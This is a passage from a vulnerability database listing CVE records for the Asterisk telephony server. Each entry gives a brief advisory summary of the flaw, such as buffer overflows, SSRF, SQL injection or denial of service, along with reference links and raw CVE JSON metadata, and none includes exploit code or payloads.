              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28260"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2019-001.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2019-001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-7251",
    "datePublished": "2019-03-28T16:18:45",
    "dateReserved": "2019-01-31T00:00:00",
    "dateUpdated": "2024-08-04T20:46:45.910Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-7617

Vulnerability from cvelistv5

Published

2017-04-10 14:00

Modified

2024-08-05 16:12

Severity ?

Summary

Remote code execution can occur in Asterisk Open Source 13.x before 13.14.1 and 14.x before 14.3.1 and Certified Asterisk 13.13 before 13.13-cert3 because of a buffer overflow in a CDR user field, related to X-ClientCode in chan_sip, the CDR dialplan function, and the AMI Monitor action.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/97377	vdb-entry, x_refsource_BID
	https://bugs.debian.org/859910	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2017-001.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T16:12:27.196Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "97377",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/97377"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.debian.org/859910"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-04-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Remote code execution can occur in Asterisk Open Source 13.x before 13.14.1 and 14.x before 14.3.1 and Certified Asterisk 13.13 before 13.13-cert3 because of a buffer overflow in a CDR user field, related to X-ClientCode in chan_sip, the CDR dialplan function, and the AMI Monitor action."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-04-11T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "97377",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/97377"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.debian.org/859910"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-7617",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Remote code execution can occur in Asterisk Open Source 13.x before 13.14.1 and 14.x before 14.3.1 and Certified Asterisk 13.13 before 13.13-cert3 because of a buffer overflow in a CDR user field, related to X-ClientCode in chan_sip, the CDR dialplan function, and the AMI Monitor action."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "97377",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/97377"
            },
            {
              "name": "https://bugs.debian.org/859910",
              "refsource": "CONFIRM",
              "url": "https://bugs.debian.org/859910"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-001.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-7617",
    "datePublished": "2017-04-10T14:00:00",
    "dateReserved": "2017-04-10T00:00:00",
    "dateUpdated": "2024-08-05T16:12:27.196Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-26499

Vulnerability from cvelistv5

Published

2022-04-15 00:00

Modified

2024-08-03 05:03

Severity ?

Summary

An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.

References

▼	URL	Tags
	https://downloads.asterisk.org/pub/security/
	https://downloads.asterisk.org/pub/security/AST-2022-002.html
	http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html
	https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html	mailing-list
	https://www.debian.org/security/2022/dsa-5285	vendor-advisory

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T05:03:32.912Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
          },
          {
            "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
          },
          {
            "name": "DSA-5285",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5285"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-18T00:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://downloads.asterisk.org/pub/security/"
        },
        {
          "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
        },
        {
          "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
        },
        {
          "name": "DSA-5285",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5285"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-26499",
    "datePublished": "2022-04-15T00:00:00",
    "dateReserved": "2022-03-06T00:00:00",
    "dateUpdated": "2024-08-03T05:03:32.912Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-7100

Vulnerability from cvelistv5

Published

2013-12-19 22:00

Modified

2024-08-06 17:53

Severity ?

Summary

Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop.

References

▼	URL	Tags
	http://www.mandriva.com/security/advisories?name=MDVSA-2013:300	vendor-advisory, x_refsource_MANDRIVA
	http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html	mailing-list, x_refsource_BUGTRAQ
	https://issues.asterisk.org/jira/browse/ASTERISK-22590	x_refsource_CONFIRM
	http://secunia.com/advisories/56294	third-party-advisory, x_refsource_SECUNIA
	http://downloads.asterisk.org/pub/security/AST-2013-006.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1029499	vdb-entry, x_refsource_SECTRACK
	http://osvdb.org/101100	vdb-entry, x_refsource_OSVDB
	http://www.debian.org/security/2014/dsa-2835	vendor-advisory, x_refsource_DEBIAN
	http://www.securityfocus.com/bid/64364	vdb-entry, x_refsource_BID
	https://exchange.xforce.ibmcloud.com/vulnerabilities/89825	vdb-entry, x_refsource_XF

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:45.993Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "MDVSA-2013:300",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:300"
          },
          {
            "name": "20131216 AST-2013-006: Buffer Overflow when receiving odd length 16 bit SMS message",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22590"
          },
          {
            "name": "56294",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/56294"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2013-006.html"
          },
          {
            "name": "1029499",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1029499"
          },
          {
            "name": "101100",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/101100"
          },
          {
            "name": "DSA-2835",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2014/dsa-2835"
          },
          {
            "name": "64364",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/64364"
          },
          {
            "name": "asterisk-sms-message-dos(89825)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89825"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-12-16T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "MDVSA-2013:300",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:300"
        },
        {
          "name": "20131216 AST-2013-006: Buffer Overflow when receiving odd length 16 bit SMS message",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22590"
        },
        {
          "name": "56294",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/56294"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2013-006.html"
        },
        {
          "name": "1029499",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1029499"
        },
        {
          "name": "101100",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/101100"
        },
        {
          "name": "DSA-2835",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2014/dsa-2835"
        },
        {
          "name": "64364",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/64364"
        },
        {
          "name": "asterisk-sms-message-dos(89825)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89825"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7100",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "MDVSA-2013:300",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2013:300"
            },
            {
              "name": "20131216 AST-2013-006: Buffer Overflow when receiving odd length 16 bit SMS message",
              "refsource": "BUGTRAQ",
              "url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0089.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-22590",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-22590"
            },
            {
              "name": "56294",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/56294"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2013-006.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2013-006.html"
            },
            {
              "name": "1029499",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1029499"
            },
            {
              "name": "101100",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/101100"
            },
            {
              "name": "DSA-2835",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2014/dsa-2835"
            },
            {
              "name": "64364",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/64364"
            },
            {
              "name": "asterisk-sms-message-dos(89825)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89825"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7100",
    "datePublished": "2013-12-19T22:00:00",
    "dateReserved": "2013-12-13T00:00:00",
    "dateUpdated": "2024-08-06T17:53:45.993Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-0779

Vulnerability from cvelistv5

Published

2003-09-12 04:00

Modified

2024-08-08 02:05

Severity ?

Summary

SQL injection vulnerability in the Call Detail Record (CDR) logging functionality for Asterisk allows remote attackers to execute arbitrary SQL via a CallerID string.

References

▼	URL	Tags
	http://www.atstake.com/research/advisories/2003/a091103-1.txt	vendor-advisory, x_refsource_ATSTAKE

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:05:12.547Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "A091103-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_ATSTAKE",
              "x_transferred"
            ],
            "url": "http://www.atstake.com/research/advisories/2003/a091103-1.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2003-09-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "SQL injection vulnerability in the Call Detail Record (CDR) logging functionality for Asterisk allows remote attackers to execute arbitrary SQL via a CallerID string."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2004-05-05T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "A091103-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_ATSTAKE"
          ],
          "url": "http://www.atstake.com/research/advisories/2003/a091103-1.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-0779",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SQL injection vulnerability in the Call Detail Record (CDR) logging functionality for Asterisk allows remote attackers to execute arbitrary SQL via a CallerID string."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "A091103-1",
              "refsource": "ATSTAKE",
              "url": "http://www.atstake.com/research/advisories/2003/a091103-1.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-0779",
    "datePublished": "2003-09-12T04:00:00",
    "dateReserved": "2003-09-11T00:00:00",
    "dateUpdated": "2024-08-08T02:05:12.547Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-9937

Vulnerability from cvelistv5

Published

2016-12-12 21:00

Modified

2024-08-06 03:07

Severity ?

Summary

An issue was discovered in Asterisk Open Source 13.12.x and 13.13.x before 13.13.1 and 14.x before 14.2.1. If an SDP offer or answer is received with the Opus codec and with the format parameters separated using a space the code responsible for parsing will recursively call itself until it crashes. This occurs as the code does not properly handle spaces separating the parameters. This does NOT require the endpoint to have Opus configured in Asterisk. This also does not require the endpoint to be authenticated. If guest is enabled for chan_sip or anonymous in chan_pjsip an SDP offer or answer is still processed and the crash occurs.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/94792	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-26579	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2016-008.html	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1037407	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T03:07:31.584Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "94792",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/94792"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26579"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-008.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff"
          },
          {
            "name": "1037407",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1037407"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-12-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk Open Source 13.12.x and 13.13.x before 13.13.1 and 14.x before 14.2.1. If an SDP offer or answer is received with the Opus codec and with the format parameters separated using a space the code responsible for parsing will recursively call itself until it crashes. This occurs as the code does not properly handle spaces separating the parameters. This does NOT require the endpoint to have Opus configured in Asterisk. This also does not require the endpoint to be authenticated. If guest is enabled for chan_sip or anonymous in chan_pjsip an SDP offer or answer is still processed and the crash occurs."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-26T09:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "94792",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/94792"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26579"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-008.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff"
        },
        {
          "name": "1037407",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1037407"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-9937",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk Open Source 13.12.x and 13.13.x before 13.13.1 and 14.x before 14.2.1. If an SDP offer or answer is received with the Opus codec and with the format parameters separated using a space the code responsible for parsing will recursively call itself until it crashes. This occurs as the code does not properly handle spaces separating the parameters. This does NOT require the endpoint to have Opus configured in Asterisk. This also does not require the endpoint to be authenticated. If guest is enabled for chan_sip or anonymous in chan_pjsip an SDP offer or answer is still processed and the crash occurs."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "94792",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/94792"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-26579",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26579"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-008.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff"
            },
            {
              "name": "1037407",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1037407"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-9937",
    "datePublished": "2016-12-12T21:00:00",
    "dateReserved": "2016-12-12T00:00:00",
    "dateUpdated": "2024-08-06T03:07:31.584Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-1507

Vulnerability from cvelistv5

Published

2011-04-27 00:00

Modified

2024-08-06 22:28

Severity ?

Summary

Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2011/1188	vdb-entry, x_refsource_VUPEN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html	vendor-advisory, x_refsource_FEDORA
	http://www.debian.org/security/2011/dsa-2225	vendor-advisory, x_refsource_DEBIAN
	http://securitytracker.com/id?1025432	vdb-entry, x_refsource_SECTRACK
	http://www.vupen.com/english/advisories/2011/1086	vdb-entry, x_refsource_VUPEN
	http://www.vupen.com/english/advisories/2011/1107	vdb-entry, x_refsource_VUPEN
	http://secunia.com/advisories/44529	third-party-advisory, x_refsource_SECUNIA
	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.digium.com/pub/security/AST-2011-005.html	x_refsource_CONFIRM
	https://bugzilla.redhat.com/show_bug.cgi?id=698916	x_refsource_CONFIRM
	http://secunia.com/advisories/44197	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
